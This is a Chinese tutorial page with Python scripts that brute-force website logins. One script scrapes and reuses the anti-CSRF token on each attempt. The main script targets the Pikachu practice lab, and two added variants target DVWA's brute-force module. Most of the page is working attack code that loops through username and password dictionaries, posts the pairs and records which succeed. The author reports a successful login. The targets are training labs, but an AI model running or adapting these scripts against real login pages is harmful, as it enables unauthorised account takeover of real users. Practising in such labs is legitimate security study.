Python实现破解网站登录密码(带token验证)

更新时间：2022年02月07日 16:13:12 作者：CVE-柠檬i

这篇文章主要为大家介绍一个Python暴力破解网站登录密码脚本(带token验证)，文中的过程讲解详细，对我们学习Python有一定的帮助，感兴趣的可以学习一下

前言

测试靶机为Pikachu漏洞练习平台暴力破解模块下的 “token防爆破?”

春节期间歇了一阵子，吃睡玩看小说。写这个脚本的起因是因为burp设置带token的暴力破解我只会用pitchfork草叉模式，要是用cluster bomb集束炸弹模式笛卡儿积那样就不会了，所以就干脆把之前写的脚本加了点东西实现这个功能了，到时候有空再学学多线程，爆破速度就更快了。

关键代码解释

设置请求头

5~11行：指定url地址和请求头，user_token设置首次发送请求包时的token值。

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

get_token函数获取token值

13~16行：这个函数返回从响应包中获取的token

在http响应包中有一个隐藏的标签里面有token值：

<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />

第15行：soup.select查找标签名为input，name为token的元素的value的值。

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token

完整代码

from bs4 import BeautifulSoup
import requests
from requests.models import Response

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
#proxies = {"http": "http://127.0.0.1:8080"}  # 代理设置，方便burp抓包查看和调试
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token

if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里，这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')    #给文件设置标题

    #遍历字典文件，Cluster bomb 暴力破解
    for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
        for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
            username = admin.strip()
            password = line.strip()
            payload = {     #payload为POST的数据
                'username': username,
                'password': password,
                'token': user_token,
                'submit': 'Login'
            }

            Response = requests.post(url, data=payload, headers=header)
            result = username + ',' + password + ',' + str(len(Response.text))  #用户名密码以及响应包长度

            print(result)           #输出到终端
            f.write(result + '\n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('\n---完成---\n')
    f.close()

运行结果

查看保存的文件，查看包长度与其他不一样的数据

这里csv不会显示前缀会自动去掉首位0，可以把文件改成txt格式就正常显示了

尝试登陆一下，登录成功。

补充

下面小编为大家补充了另外两个利用Python实现破解网站登录密码的示例代码，希望对大家有所帮助

方法一：

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理设置，方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + '包长度' + '\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
        result = str(Response.status_code) + ',' + username + ','\
            + password + ',' + str(len(Response.content))
        f.write(result + '\n')
        
        print('\n完成')

方法二：

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理设置，方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
        if not(Response.text.find('Welcome to the password protected area')==-1):
            result = username + ':' + password
            print(result)
            f.write(result + '\n')
            
            print('\n完成')

以上就是Python实现破解网站登录密码(带token验证)的详细内容，更多关于Python破解网站登录密码的资料请关注脚本之家其它相关文章！

您可能感兴趣的文章:

在Python文件中指定Python解释器的方法
今天小编就为大家分享一篇在Python文件中指定Python解释器的方法，具有很好的参考价值，希望对大家有所帮助。一起跟随小编过来看看吧
2019-02-02
python操作sqlite的CRUD实例分析
这篇文章主要介绍了python操作sqlite的CRUD实现方法,涉及Python操作SQLite数据库CURD相关技巧,需要的朋友可以参考下
2015-05-05
Python Scrapy 框架简单介绍
Scrapy是适用于Python的一个快速、高层次的屏幕抓取和web抓取框架，用于抓取web站点并从页面中提取结构化的数据，这篇文章主要介绍了Scrapy框架优点及简单介绍,需要的朋友可以参考下
2023-05-05
python根据文章标题内容自动生成摘要的实例
今天小编就为大家分享一篇python根据文章标题内容自动生成摘要的实例，具有很好的参考价值，希望对大家有所帮助。一起跟随小编过来看看吧
2019-02-02
Pycharm中如何关掉python console
这篇文章主要介绍了Pycharm中如何关掉python console,本文给大家介绍的非常详细，对大家的学习或工作具有一定的参考借鉴价值，需要的朋友可以参考下
2020-10-10
python基础之函数的返回值
这篇文章主要介绍了Python函数返回值,实例分析了Python中返回一个返回值与多个返回值的方法,需要的朋友可以参考下
2021-10-10
使用Python编程分析火爆全网的鱿鱼游戏豆瓣影评
本文来为大家介绍如何使用Python爬取影评的操作，主要是爬取《鱿鱼游戏》在豆瓣上的一些影评，对数据做一些简单的分析，用数据的角度重新审视下这部剧，有需要的朋友可以借鉴参考下
2021-10-10
使用python 和 lint 删除项目无用资源的方法
这篇文章主要介绍了利用 python 和 lint 删除项目无用资源的方法，使用方法是将 python 目录下的 delUnused.py 放到项目目录下，然后直接运行即可,需要的朋友可以参考下
2017-12-12
初步探究Python程序的执行原理
这篇文章主要介绍了Python程序的执行原理,简要地描述了其中的步骤,需要的朋友可以参考下
2015-04-04
Python中DataFrame中的xs用法
本文主要介绍了Python中DataFrame中的xs用法，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧
2023-04-04